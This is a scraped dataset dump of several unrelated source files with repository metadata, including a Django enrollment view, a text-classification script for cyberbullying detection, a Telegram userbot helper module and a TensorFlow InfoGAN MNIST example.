        return ''.join(word.capitalize() or '_' for word in name.split("_"))

    @staticmethod
    def to_underscore(name):
        """
        Parameters
        ----------
        name : str
            The string to convert to underscore formatting

        Returns
        -------
        str
            Converted name string from camel case to underscore
        """
        s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', name)
        return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower()

    def load_command(self, name, namespace, **kwargs):
        """
        Import ``<namespace>.<name>`` and run the class named after the command.

        Parameters
        ----------
        name : str
            The name of the command
        namespace : str
            A string representation of the namespace wherein the command is located (Example: commandable.commands)
        kwargs :
            A dictionary to pass to the command as arguments.

        Returns
        -------
        The command instance, or None when the module does not exist or the
        loaded object is not a Command.
        """
        kwargs["namespaces"] = self.namespaces
        try:
            # Module name convention: lower-cased command name inside the namespace.
            command_module: Module = importlib.import_module(namespace + "." + str.lower(name))
        except ModuleNotFoundError:
            return None
        # Class name convention: CamelCase version of the command name.
        cmd: Command = getattr(command_module, self.to_camelcase(name))(self.arguments)
        if isinstance(cmd, Command):
            # Commands are context managers; command() runs inside their scope.
            with cmd:
                cmd.command(**kwargs)
        else:
            return None
        return cmd
| [
"job.tiel@newcraftgroup.com"
] | job.tiel@newcraftgroup.com |
479c2117988d2ed2dca6b2805202adc6d5027b9d | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02397/s357415256.py | f7d7f986e5b38a58810ae61c71f351e5d8d9603c | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 165 | py | while True:
c = input().split()
x, y = int(c[0]), int(c[1])
if x == y == 0:
break
if y < x:
x, y = y, x
print("%d %d" % (x, y))
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
46623ffb901b7b2eebaec341546d5b88580238ab | 04e434ccd57039ee6ea42e18a7eb6a85cd48aab3 | /methods.py | 524ce7ad5b47da8acf07fbae2d5ee96620b59708 | [] | no_license | trocker/Cyberbullying-Detection | 10d4a6565bf6f5acf720397705d5a069a70c6c50 | 7276060a43aaef9f33de2dc6390816eddd3f65dc | refs/heads/master | 2023-03-25T02:05:59.133351 | 2020-03-18T15:04:05 | 2020-03-18T15:04:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,745 | py | import pandas as pd
import numpy as np
import re
import os
from nltk.corpus import stopwords
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.naive_bayes import MultinomialNB
from sklearn import svm
from sklearn.model_selection import train_test_split
from sklearn import metrics
from sklearn.metrics import accuracy_score
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
from sklearn.ensemble import RandomForestClassifier
#CLASSIFICATION METHOD
def Classifications(X_train_word_features, test_features, y_train, y_test, method_name):
    """Train Naive Bayes, linear SVM and Random Forest on the given feature
    matrices and print each model's test-set accuracy.

    Output text is identical to the original implementation; nothing is
    returned.
    """
    classifiers = [
        ("Naive Bayes Classifier", MultinomialNB()),
        ("SVM", svm.SVC(kernel='linear', C = 1.0)),
        ("Random Forest", RandomForestClassifier()),
    ]
    print("\nAccuracies by using ", method_name)
    for label, classifier in classifiers:
        fitted = classifier.fit(X_train_word_features, y_train)
        predictions = fitted.predict(test_features)
        print("Accuracy with " + label + ": ", accuracy_score(y_test, predictions))
    return
###WEIGHTING METHODS
#TF*IDF
def TfidfWeighting(x_train, x_test):
    """Vectorize documents with TF*IDF weights.

    Fits a word-level TfidfVectorizer (Turkish stop words removed, sublinear
    TF, top 30000 features, tokens of 2+ word characters) on the training
    texts and transforms both splits.

    Returns:
        (train_features, test_features) as sparse matrices.
    """
    word_vectorizer = TfidfVectorizer(
        # BUG FIX: the stop-word list was passed positionally, which bound it
        # to TfidfVectorizer's first parameter `input` (expects 'content',
        # 'file' or 'filename'), so the Turkish stop words were silently
        # ignored. It must be passed as the `stop_words` keyword.
        stop_words=stopwords.words('turkish'),
        sublinear_tf=True,
        strip_accents='unicode',
        analyzer='word',
        token_pattern=r'\w{2,}',  # vectorize 2-character words or more
        ngram_range=(1, 1),
        max_features=30000)
    word_vectorizer.fit(x_train)
    X_train_word_features = word_vectorizer.transform(x_train)
    test_features = word_vectorizer.transform(x_test)
    return X_train_word_features, test_features
#TF
def TfWeighting(x_train, x_test):
    """Vectorize documents with raw term-frequency (TF) weights: IDF scaling,
    smoothing, sublinear TF and normalization are all disabled.

    Returns:
        (train_features, test_features) as sparse matrices.
    """
    tf_vectorizer = TfidfVectorizer(use_idf=False, smooth_idf=False, sublinear_tf=False, norm=None, analyzer='word')
    tf_vectorizer.fit(x_train)
    return tf_vectorizer.transform(x_train), tf_vectorizer.transform(x_test)
#BW
def BinaryWeighting(x_train, x_test):
    """Vectorize documents with binary (presence/absence) term weights.

    Fits a CountVectorizer on the training texts and transforms both splits
    to dense arrays.

    Returns:
        (train_features, test_features) as dense numpy arrays.
    """
    # BUG FIX: the stop-word list was passed positionally, which bound it to
    # CountVectorizer's first parameter `input` (expects 'content', 'file' or
    # 'filename'), so the Turkish stop words were silently ignored. It must
    # be passed as the `stop_words` keyword.
    count_vec = CountVectorizer(stop_words=stopwords.words('turkish'), analyzer='word',
                                ngram_range=(1, 1), max_df=1.0, min_df=1,
                                max_features=None, binary=True)
    X_train_word_features = count_vec.fit_transform(x_train).toarray()
    test_features = count_vec.transform(x_test).toarray()
    return X_train_word_features, test_features
| [
"noreply@github.com"
] | noreply@github.com |
80b04bda0f5a1a85445586eeefba6f62ab5f57be | d71ea190beaa1a5ea8bb6f6e7260e3de3106478e | /semester_enrollment/views.py | ad02a55fe160781feb990f868f7d285190b4d9ad | [
"MIT"
] | permissive | c3n7/university-portal | a5e53d82746726f03268da9d9bb270fd5266438d | 82bf40a1c0d98111ffe8a184d16b543a3feec072 | refs/heads/master | 2023-08-14T05:18:28.449162 | 2021-09-24T14:01:47 | 2021-09-24T14:01:47 | 221,428,849 | 1 | 0 | MIT | 2021-09-24T14:01:47 | 2019-11-13T10:05:35 | Python | UTF-8 | Python | false | false | 2,208 | py | from django.contrib.auth.mixins import (
LoginRequiredMixin,
UserPassesTestMixin,
)
from django.shortcuts import get_object_or_404
from django.views.generic import DetailView, ListView
from django.views.generic.edit import UpdateView, CreateView
from django.urls import reverse_lazy
from django.contrib import messages
from .models import SemesterEnrollment
from students.models import Student
from course_registration.models import CourseRegistration
class SemesterEnrollmentCreateView(LoginRequiredMixin, UserPassesTestMixin, CreateView):
    """Let a logged-in student enrol one of their registered courses in a semester.

    The course registration comes from the ``course_reg_pk`` URL kwarg; the
    student is derived from the authenticated user, so neither is editable
    in the form.
    """
    model = SemesterEnrollment
    template_name = "semester_enrollment/add.html"
    # Only year/semester are user-editable; student and course are set in form_valid.
    fields = ('year', 'semester')
    # Redirect target when the access checks fail.
    login_url = "student_detail"

    def test_func(self):
        """Allow access only when the current user has a Student record."""
        return (Student.objects.filter(user=self.request.user).exists())

    def dispatch(self, request, *args, **kwargs):
        # Resolve the course registration once, before any handler runs;
        # 404s early when the pk is invalid.
        self.enrolled_course = get_object_or_404(CourseRegistration, pk=kwargs['course_reg_pk'])
        return super().dispatch(request, *args, **kwargs)

    def form_valid(self, form):
        # Attach the non-editable foreign keys before the parent saves the form.
        form.instance.enrolled_course = self.enrolled_course
        student = Student.objects.filter(user=self.request.user).first()
        form.instance.student = student
        return super(SemesterEnrollmentCreateView, self).form_valid(form)
class SemesterEnrollmentUpdateView(LoginRequiredMixin, UpdateView):
    """Edit the year/semester of an existing enrollment (login required)."""
    model = SemesterEnrollment
    fields = ('year', 'semester')
    template_name = "semester_enrollment/edit.html"
class SemesterEnrollmentDetailView(LoginRequiredMixin, DetailView):
    """Show a single semester enrollment (login required)."""
    model = SemesterEnrollment
    template_name = "semester_enrollment/detail.html"
class SemesterEnrollmentListView(LoginRequiredMixin, ListView):
    """List the logged-in student's enrollments, newest year/semester first."""
    model = SemesterEnrollment
    template_name = 'semester_enrollment/list.html'
    ordering = ['-year', '-semester']

    def get_queryset(self):
        # Restrict the list to the current user's Student record.
        # NOTE(review): `student` is None when the user has no Student row;
        # filter(student=None) would then match enrollments with a null
        # student — confirm that is the intended behaviour.
        student = Student.objects.filter(user=self.request.user).first()
        return super().get_queryset().filter(student=student)
# class CRStaffListView(LoginRequiredMixin, ListView):
# model = CourseRegistration
# template_name = 'list.html'
# ordering = ['is_verified', 'user__email']
| [
"kartimothy@gmail.com"
] | kartimothy@gmail.com |
31b1ea48698889979a5945ca7183f21b2bc342d8 | 9326ce62cf5ab4c87fe46f6055aabd48b7a0cfe1 | /test/Driver/Dependencies/Inputs/touch.py | f5c609089303c0cfa5cf3285fd69317f0f447da2 | [
"Apache-2.0",
"Swift-exception"
] | permissive | dan-zheng/swift | 2fae54c8eea72f9316a5c37e5af2f974707d14ad | 6a80196da3cbbb32683144b175e4028d90f5241d | refs/heads/main | 2021-11-28T05:57:42.415265 | 2021-07-09T16:23:39 | 2021-07-09T16:23:39 | 135,949,956 | 15 | 2 | Apache-2.0 | 2019-10-18T00:26:50 | 2018-06-03T23:56:41 | C++ | UTF-8 | Python | false | false | 956 | py | #!/usr/bin/env python
# touch.py - /bin/touch that writes the LLVM epoch -*- python -*-
#
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2017 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See https://swift.org/LICENSE.txt for license information
# See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
#
# ----------------------------------------------------------------------------
#
# Like /bin/touch, but takes a time using the system_clock epoch.
#
# ----------------------------------------------------------------------------
import os
import sys
def main(argv=None):
    """Set atime and mtime of each named file to the given epoch value,
    creating the file if necessary (like /bin/touch with an explicit time).

    Args:
        argv: argument vector; argv[1] is the integer timestamp, the rest
            are file paths. Defaults to sys.argv.
    """
    if argv is None:
        argv = sys.argv
    # The original used `assert` for argument validation, which is silently
    # stripped under `python -O`; exit with a usage message instead.
    if len(argv) < 2:
        sys.exit("usage: touch.py <timestamp> [files...]")
    time_val = int(argv[1])
    for output_file in argv[2:]:
        # Update the output file mtime, or create it if necessary.
        # From http://stackoverflow.com/a/1160227.
        with open(output_file, 'a'):
            os.utime(output_file, (time_val, time_val))


if __name__ == '__main__':
    main()
| [
"devteam.codafi@gmail.com"
] | devteam.codafi@gmail.com |
0c9a6e7cc52d420cc0423507992780d376e1a9e7 | 3ea525af04db4f0969a85cb17b0afab7fd76e424 | /cmsplugin_feed_ai/providers/exceptions.py | 5dd7333afa1b36fec2713eae223cb8cd78e9072d | [
"MIT"
] | permissive | andersinno/cmsplugin-feed-ai | c447a8b296f4636f50cde10f8d263ffac5d4acb4 | 5787330115b553803e7a7d80ad9df0e491eafc7a | refs/heads/master | 2020-04-15T13:51:59.131361 | 2016-09-21T07:05:04 | 2016-09-21T07:05:04 | 68,205,360 | 0 | 0 | null | 2016-09-21T06:42:42 | 2016-09-14T12:42:28 | Python | UTF-8 | Python | false | false | 200 | py | # -*- coding: utf-8 -*-
class FeedException(Exception):
    """Wraps another exception raised by a feed provider.

    The wrapped exception stays reachable via ``original_exception`` and its
    class and message are folded into this exception's own message.
    """

    def __init__(self, exc):
        message = '%s: %s' % (exc.__class__, exc)
        super(FeedException, self).__init__(message)
        self.original_exception = exc
| [
"jesse.laukkanen@anders.fi"
] | jesse.laukkanen@anders.fi |
4d5ae49d3097311f5d61d4990faa32a51f9d6dc6 | 749f25209878be42c92b8c4b76206c63794969a5 | /tests/export_name_s.py | a353a18ead8b994e5e8bda009a9ca2773da8a404 | [] | no_license | vakabus/septic | f24d22bc3497c0ac3e7c34cded2b914d2d58eb34 | 88849b9784d785e0978b7a39e3b49a9381378c52 | refs/heads/master | 2020-03-18T23:49:45.495135 | 2018-05-30T11:09:35 | 2018-05-30T11:09:35 | 135,431,467 | 1 | 0 | null | 2018-05-30T11:13:53 | 2018-05-30T11:13:52 | null | UTF-8 | Python | false | false | 224 | py | @export(name='renamed_func')
def original_func(a, b):
return 'ok'
@export(name='RenamedClass')
class OriginalClass:
@export
def __init__(self):
pass
@export
def func(self):
return 'ok'
| [
"jbenc@upir.cz"
] | jbenc@upir.cz |
1d08e20a707c3832aa534f66e7f853d8c23c34ee | 664888153523b056029dc8040b475d94e4d86836 | /userbot/utils/extras.py | 6be2aa1f8955464520669ba42d962bf621355521 | [] | no_license | Hobby-Dev-0/K | aa2d7c55c0235f82a26cdcc08451580cac428470 | fd91468897533e8c7e44c3a8b6fad9acf1e2ae82 | refs/heads/master | 2023-06-26T14:28:42.698755 | 2021-07-23T14:19:23 | 2021-07-23T14:19:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,138 | py | import asyncio
import os
import re
from .. import *
from ..config import Config
from ..helpers import *
# either edit or reply that msg
# either edit or reply that msg
async def edit_or_reply(
    event,
    text,
    parse_mode=None,
    link_preview=None,
    file_name=None,
    aslink=False,
    deflink=False,
    noformat=False,
    linktext=None,
    caption=None,
):
    """Deliver *text* as a response to *event*, choosing the transport by size.

    Behaviour:
      * text under 4096 chars (and not ``deflink``): sudo users get a reply,
        the bot's own messages are edited in place.
      * otherwise, unless ``noformat``, markdown markers (**, `, __) are
        stripped; with ``aslink``/``deflink`` the text is pasted to nekobin
        (del.dog as fallback) and a link is sent; else the text is written to
        ``file_name`` (default output.txt) and uploaded as a document, after
        which the local file is removed and the trigger message deleted.

    NOTE(review): `re` and `requests` are assumed to come from the wildcard
    imports at the top of this module — confirm.
    """
    link_preview = link_preview or False
    reply_to = await event.get_reply_message()
    # Short messages fit in a single Telegram message (4096-char limit).
    if len(text) < 4096 and not deflink:
        parse_mode = parse_mode or "md"
        if event.sender_id in Config.SUDO_USERS:
            # Sudo users cannot edit the bot's messages, so reply instead,
            # preferring the message the trigger replied to.
            if reply_to:
                return await reply_to.reply(
                    text, parse_mode=parse_mode, link_preview=link_preview
                )
            return await event.reply(
                text, parse_mode=parse_mode, link_preview=link_preview
            )
        await event.edit(text, parse_mode=parse_mode, link_preview=link_preview)
        return event
    if not noformat:
        # Strip markdown markers before pasting/uploading as plain text.
        asciich = ["**", "`", "__"]
        for i in asciich:
            text = re.sub(rf"\{i}", "", text)
    if aslink or deflink:
        linktext = linktext or "Message was to big so pasted to bin"
        try:
            key = (
                requests.post(
                    "https://nekobin.com/api/documents", json={"content": text}
                )
                .json()
                .get("result")
                .get("key")
            )
            text = linktext + f" [here](https://nekobin.com/{key})"
        except Exception:
            # nekobin failed: fall back to del.dog (bullets replaced first).
            text = re.sub(r"•", ">>", text)
            kresult = requests.post(
                "https://del.dog/documents", data=text.encode("UTF-8")
            ).json()
            text = linktext + f" [here](https://del.dog/{kresult['key']})"
        if event.sender_id in Config.SUDO_USERS:
            if reply_to:
                return await reply_to.reply(text, link_preview=link_preview)
            return await event.reply(text, link_preview=link_preview)
        await event.edit(text, link_preview=link_preview)
        return event
    # Fallback: ship the oversized text as a document.
    file_name = file_name or "output.txt"
    caption = caption or None
    with open(file_name, "w+") as output:
        output.write(text)
    if reply_to:
        await reply_to.reply(caption, file=file_name)
        await event.delete()
        return os.remove(file_name)
    if event.sender_id in Config.SUDO_USERS:
        await event.reply(caption, file=file_name)
        await event.delete()
        return os.remove(file_name)
    await event.client.send_file(event.chat_id, file_name, caption=caption)
    await event.delete()
    os.remove(file_name)
# delete timeout
async def delete(event, text, time=None, parse_mode=None, link_preview=None):
    """Show *text* as a response to *event*, wait, then delete that message.

    Sudo users get a reply (to the replied-to message when present); the
    bot's own trigger message is edited in place instead. The shown message
    is removed after ``time`` seconds (default 10).
    """
    parse_mode = parse_mode or "md"
    link_preview = link_preview or False
    delay = time or 10
    if event.sender_id in Config.SUDO_USERS:
        replied = await event.get_reply_message()
        target = replied if replied else event
        event = await target.reply(
            text, link_preview=link_preview, parse_mode=parse_mode
        )
    else:
        event = await event.edit(
            text, link_preview=link_preview, parse_mode=parse_mode
        )
    await asyncio.sleep(delay)
    return await event.delete()
async def edit_delete(event, text, time=None, parse_mode=None, link_preview=None):
    """Show *text* as a response to *event*, wait ``time`` seconds (default 5),
    then delete.

    NOTE(review): unlike `delete`, the sudo list comes from _sudousers_list()
    rather than Config.SUDO_USERS, and in the sudo branch the freshly sent
    reply (`catevent`) is kept while the ORIGINAL `event` message is deleted —
    confirm both differences are intentional.
    """
    sudo_users = _sudousers_list()
    parse_mode = parse_mode or "md"
    link_preview = link_preview or False
    time = time or 5
    if event.sender_id in sudo_users:
        reply_to = await event.get_reply_message()
        # Reply to the replied-to message when present, else to the trigger.
        catevent = (
            await reply_to.reply(text, link_preview=link_preview, parse_mode=parse_mode)
            if reply_to
            else await event.reply(
                text, link_preview=link_preview, parse_mode=parse_mode
            )
        )
    else:
        # The bot's own message: edit it in place.
        event = await event.edit(
            text, link_preview=link_preview, parse_mode=parse_mode
        )
    await asyncio.sleep(time)
    return await event.delete()
| [
"noreply@github.com"
] | noreply@github.com |
4011ab64d779b6715e55022edcece9470b6c3957 | eefa1f707e6be6f16417947894ec03bf918b3922 | /tools_py/pack/examples/GAN/InfoGAN-mnist.py | 3e42b15bed3d1d97049683df83ab368c3fd64317 | [
"Apache-2.0"
] | permissive | zhouyq041/master | c7c59608e72b53fc1a3210a221a0d0c545fcec31 | 4826620b8090a58c439c1f540351ac168e3cd880 | refs/heads/master | 2020-03-28T10:07:33.833241 | 2018-09-10T03:16:19 | 2018-09-10T03:16:19 | 148,084,922 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,720 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: InfoGAN-mnist.py
# Author: Yuxin Wu <ppwwyyxxc@gmail.com>
import cv2
import numpy as np
import tensorflow as tf
import os
import argparse
from tensorpack import *
from tensorpack.utils import viz
from tensorpack.tfutils.scope_utils import auto_reuse_variable_scope, under_name_scope
from tensorpack.tfutils import optimizer, summary, gradproc
from tensorpack.dataflow import dataset
from GAN import GANTrainer, GANModelDesc
"""
To train:
./InfoGAN-mnist.py
To visualize:
./InfoGAN-mnist.py --sample --load path/to/model
A pretrained model is at http://models.tensorpack.com/GAN/
"""
BATCH = 128
# latent space is cat(10) x uni(2) x noise(NOISE_DIM)
NUM_CLASS = 10          # categorical code: one dimension per MNIST digit
NUM_UNIFORM = 2         # two continuous ("uniform") codes
DIST_PARAM_DIM = NUM_CLASS + NUM_UNIFORM  # size of the recognition head's output
NOISE_DIM = 62          # unstructured noise dimensions
# prior: the assumption how the latent factors are presented in the dataset.
# First NUM_CLASS entries are categorical logits (all equal -> uniform over
# digits), the rest are the means of the unit-variance Normals (see
# get_distributions below).
DIST_PRIOR_PARAM = [1.] * NUM_CLASS + [0.] * NUM_UNIFORM
def shapeless_placeholder(x, axis, name):
    """Create a placeholder defaulting to ``x`` with a less specific static shape.

    Feeding a tensor requires the fed value to match the tensor's static
    shape. The returned placeholder behaves like ``x`` when not fed, but has
    ``None`` at the requested axes of its static shape, so values of other
    sizes along those axes may be fed.
    See also `tensorflow#5680 <https://github.com/tensorflow/tensorflow/issues/5680>`_.

    Args:
        x: a tensor
        axis(int or list of ints): these axes of ``x.get_shape()`` will become
            None in the output.
        name(str): name of the output tensor

    Returns:
        a tensor equal to x, but shape information is partially cleared.
    """
    axes = axis if isinstance(axis, list) else [axis]
    new_shape = x.get_shape().as_list()
    for ax in axes:
        if new_shape[ax] is None:
            raise ValueError("Axis {} of shape {} is already unknown!".format(ax, new_shape))
        new_shape[ax] = None
    return tf.placeholder_with_default(x, shape=new_shape, name=name)
def get_distributions(vec_cat, vec_uniform):
    """Build the latent-code distributions from their parameter vectors.

    Args:
        vec_cat: logits of the categorical code.
        vec_uniform: means of the unit-variance Normals modelling the
            continuous codes.

    Returns:
        (Categorical, Normal) distribution pair.
    """
    categorical = tf.distributions.Categorical(logits=vec_cat, validate_args=True, name='cat')
    gaussian = tf.distributions.Normal(vec_uniform, scale=1., validate_args=True, allow_nan_stats=False, name='uni_a')
    return categorical, gaussian
def entropy_from_samples(samples, vec):
    """
    Estimate H(x|s) ~= -E_{x \sim P(x|s)}[\log Q(x|s)], where x are samples, and Q is parameterized by vec.

    Args:
        samples: latent-code samples; first NUM_CLASS columns are the one-hot
            categorical part, the rest the continuous part.
        vec: predicted distribution parameters (the recognition head output).

    Returns:
        list of two scalar tensors: [categorical NLL, uniform NLL], each
        averaged over the batch.
    """
    # Recover the class index from the one-hot columns; keep the continuous
    # columns as-is.
    samples_cat = tf.argmax(samples[:, :NUM_CLASS], axis=1, output_type=tf.int32)
    samples_uniform = samples[:, NUM_CLASS:]
    cat, uniform = get_distributions(vec[:, :NUM_CLASS], vec[:, NUM_CLASS:])

    def neg_logprob(dist, sample, name):
        # Negative log-likelihood of the samples under the predicted distribution.
        nll = -dist.log_prob(sample)
        # average over batch
        return tf.reduce_sum(tf.reduce_mean(nll, axis=0), name=name)

    entropies = [neg_logprob(cat, samples_cat, 'nll_cat'),
                 neg_logprob(uniform, samples_uniform, 'nll_uniform')]
    return entropies
@under_name_scope()
def sample_prior(batch_size):
    """Draw ``batch_size`` latent codes from the fixed prior: a one-hot
    categorical sample concatenated with NUM_UNIFORM values drawn uniformly
    from [-1, 1)."""
    cat, _ = get_distributions(DIST_PRIOR_PARAM[:NUM_CLASS], DIST_PRIOR_PARAM[NUM_CLASS:])
    sample_cat = tf.one_hot(cat.sample(batch_size), NUM_CLASS)

    """
    OpenAI official code actually models the "uniform" latent code as
    a Gaussian distribution, but obtain the samples from a uniform distribution.
    """
    sample_uni = tf.random_uniform([batch_size, NUM_UNIFORM], -1, 1)
    samples = tf.concat([sample_cat, sample_uni], axis=1)
    return samples
class Model(GANModelDesc):
    """InfoGAN model: DCGAN-style generator/discriminator plus a recognition
    head on the discriminator that predicts the latent-code distribution."""

    def inputs(self):
        """Declare the single model input: a batch of 28x28 MNIST images."""
        return [tf.placeholder(tf.float32, (None, 28, 28), 'input')]

    def generator(self, z):
        """Map a latent vector ``z`` to an image in [0, 1] (sigmoid output)."""
        l = FullyConnected('fc0', z, 1024, activation=BNReLU)
        l = FullyConnected('fc1', l, 128 * 7 * 7, activation=BNReLU)
        # Reshape to a 7x7 feature map, then two stride-2 deconvs: 7 -> 14 -> 28.
        l = tf.reshape(l, [-1, 7, 7, 128])
        l = Conv2DTranspose('deconv1', l, 64, 4, 2, activation=BNReLU)
        l = Conv2DTranspose('deconv2', l, 1, 4, 2, activation=tf.identity)
        l = tf.sigmoid(l, name='gen')
        return l

    @auto_reuse_variable_scope
    def discriminator(self, imgs):
        """Return (real/fake logits, predicted latent-distribution parameters).

        Variables are shared between the real and fake passes via
        @auto_reuse_variable_scope.
        """
        with argscope(Conv2D, kernel_size=4, strides=2):
            l = (LinearWrap(imgs)
                 .Conv2D('conv0', 64)
                 .tf.nn.leaky_relu()
                 .Conv2D('conv1', 128)
                 .BatchNorm('bn1')
                 .tf.nn.leaky_relu()
                 .FullyConnected('fc1', 1024)
                 .BatchNorm('bn2')
                 .tf.nn.leaky_relu()())

            logits = FullyConnected('fct', l, 1)
            # Recognition head: DIST_PARAM_DIM outputs (categorical logits +
            # means for the continuous codes), consumed by entropy_from_samples.
            encoder = (LinearWrap(l)
                       .FullyConnected('fce1', 128)
                       .BatchNorm('bne')
                       .tf.nn.leaky_relu()
                       .FullyConnected('fce-out', DIST_PARAM_DIM)())
        return logits, encoder

    def _build_graph(self, inputs):
        """Build the training graph: standard GAN losses plus the negated
        mutual-information term added to both generator and discriminator."""
        real_sample = inputs[0]
        real_sample = tf.expand_dims(real_sample, -1)

        # sample the latent code:
        zc = shapeless_placeholder(sample_prior(BATCH), 0, name='z_code')
        z_noise = shapeless_placeholder(
            tf.random_uniform([BATCH, NOISE_DIM], -1, 1), 0, name='z_noise')
        z = tf.concat([zc, z_noise], 1, name='z')

        with argscope([Conv2D, Conv2DTranspose, FullyConnected],
                      kernel_initializer=tf.truncated_normal_initializer(stddev=0.02)):
            with tf.variable_scope('gen'):
                fake_sample = self.generator(z)

            # Export generated images (scaled to uint8) for TensorBoard/sampling.
            fake_sample_viz = tf.cast((fake_sample) * 255.0, tf.uint8, name='viz')
            tf.summary.image('gen', fake_sample_viz, max_outputs=30)

            # may need to investigate how bn stats should be updated across two discrim
            with tf.variable_scope('discrim'):
                real_pred, _ = self.discriminator(real_sample)
                fake_pred, dist_param = self.discriminator(fake_sample)

        """
        Mutual information between x (i.e. zc in this case) and some
        information s (the generated samples in this case):
        I(x;s) = H(x) - H(x|s)
               = H(x) + E[\log P(x|s)]
        The distribution from which zc is sampled, in this case, is set to a fixed prior already.
        So the first term is a constant.
        For the second term, we can maximize its variational lower bound:
        E_{x \sim P(x|s)}[\log Q(x|s)]
        where Q(x|s) is a proposal distribution to approximate P(x|s).
        Here, Q(x|s) is assumed to be a distribution which shares the form
        of P, and whose parameters are predicted by the discriminator network.
        """
        with tf.name_scope("mutual_information"):
            with tf.name_scope('prior_entropy'):
                cat, uni = get_distributions(DIST_PRIOR_PARAM[:NUM_CLASS], DIST_PRIOR_PARAM[NUM_CLASS:])
                ents = [cat.entropy(name='cat_entropy'), tf.reduce_sum(uni.entropy(), name='uni_entropy')]
                entropy = tf.add_n(ents, name='total_entropy')
                # Note that the entropy of prior is a constant. The paper mentioned it but didn't use it.
            with tf.name_scope('conditional_entropy'):
                cond_ents = entropy_from_samples(zc, dist_param)
                cond_entropy = tf.add_n(cond_ents, name="total_entropy")

            MI = tf.subtract(entropy, cond_entropy, name='mutual_information')
            summary.add_moving_summary(entropy, cond_entropy, MI, *cond_ents)

        # default GAN objective
        self.build_losses(real_pred, fake_pred)

        # subtract mutual information for latent factors (we want to maximize them)
        self.g_loss = tf.subtract(self.g_loss, MI, name='total_g_loss')
        self.d_loss = tf.subtract(self.d_loss, MI, name='total_d_loss')
        summary.add_moving_summary(self.g_loss, self.d_loss)

        # distinguish between variables of generator and discriminator updates
        self.collect_variables()

    def _get_optimizer(self):
        """Adam (beta1=0.5) with a fixed learning rate; generator gradients
        are scaled 5x via a gradient processor."""
        lr = tf.get_variable('learning_rate', initializer=2e-4, dtype=tf.float32, trainable=False)
        opt = tf.train.AdamOptimizer(lr, beta1=0.5, epsilon=1e-6)
        # generator learns 5 times faster
        return optimizer.apply_grad_processors(
            opt, [gradproc.ScaleGradient(('gen/.*', 5))])
def get_data():
    """Return the input dataflow: MNIST train and test sets concatenated,
    grouped into batches of BATCH."""
    combined = ConcatData([dataset.Mnist('train'), dataset.Mnist('test')])
    return BatchData(combined, BATCH)
def sample(model_path):
    """Interactively visualize the latent space of a trained model.

    Loads the checkpoint at *model_path* and repeatedly shows three 10x10
    image grids side by side: (1) the 10 categorical codes with random noise,
    (2) the first continuous code swept from -2 to +2 with zero noise,
    (3) the second continuous code swept likewise.
    """
    pred = OfflinePredictor(PredictConfig(
        session_init=get_model_loader(model_path),
        model=Model(),
        input_names=['z_code', 'z_noise'],
        output_names=['gen/viz']))

    # sample all one-hot encodings (10 times) -> 100 rows, one digit per column
    z_cat = np.tile(np.eye(10), [10, 1])
    # sample continuous variables from -2 to +2 as mentioned in the paper
    z_uni = np.linspace(-2.0, 2.0, num=100)
    z_uni = z_uni[:, None]
    IMG_SIZE = 400

    while True:
        # only categorical turned on (both continuous codes zeroed)
        z_noise = np.random.uniform(-1, 1, (100, NOISE_DIM))
        zc = np.concatenate((z_cat, z_uni * 0, z_uni * 0), axis=1)
        o = pred(zc, z_noise)[0]
        viz1 = viz.stack_patches(o, nr_row=10, nr_col=10)
        viz1 = cv2.resize(viz1, (IMG_SIZE, IMG_SIZE))

        # show effect of first continuous variable with fixed (zero) noise
        zc = np.concatenate((z_cat, z_uni, z_uni * 0), axis=1)
        o = pred(zc, z_noise * 0)[0]
        viz2 = viz.stack_patches(o, nr_row=10, nr_col=10)
        viz2 = cv2.resize(viz2, (IMG_SIZE, IMG_SIZE))

        # show effect of second continuous variable with fixed (zero) noise
        zc = np.concatenate((z_cat, z_uni * 0, z_uni), axis=1)
        o = pred(zc, z_noise * 0)[0]
        viz3 = viz.stack_patches(o, nr_row=10, nr_col=10)
        viz3 = cv2.resize(viz3, (IMG_SIZE, IMG_SIZE))

        # One canvas with the three grids side by side, red borders between.
        canvas = viz.stack_patches(
            [viz1, viz2, viz3],
            nr_row=1, nr_col=3, border=5, bgcolor=(255, 0, 0))
        viz.interactive_imshow(canvas)
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--gpu', help='comma separated list of GPU(s) to use.')
    parser.add_argument('--load', help='load model')
    parser.add_argument('--sample', action='store_true', help='visualize the space of the 10 latent codes')
    args = parser.parse_args()
    if args.gpu:
        os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
    if args.sample:
        # Rebinds the module-level BATCH (we are at module scope here) so the
        # predictor matches the 100-sample grids built in sample().
        BATCH = 100
        sample(args.load)
    else:
        # Training mode: log dir derived from the script name; optionally
        # resume from --load.
        logger.auto_set_dir()
        GANTrainer(QueueInput(get_data()),
                   Model()).train_with_defaults(
            callbacks=[ModelSaver(keep_checkpoint_every_n_hours=0.1)],
            steps_per_epoch=500,
            max_epoch=100,
            session_init=SaverRestore(args.load) if args.load else None
        )
| [
"1062558260@qq.com"
] | 1062558260@qq.com |
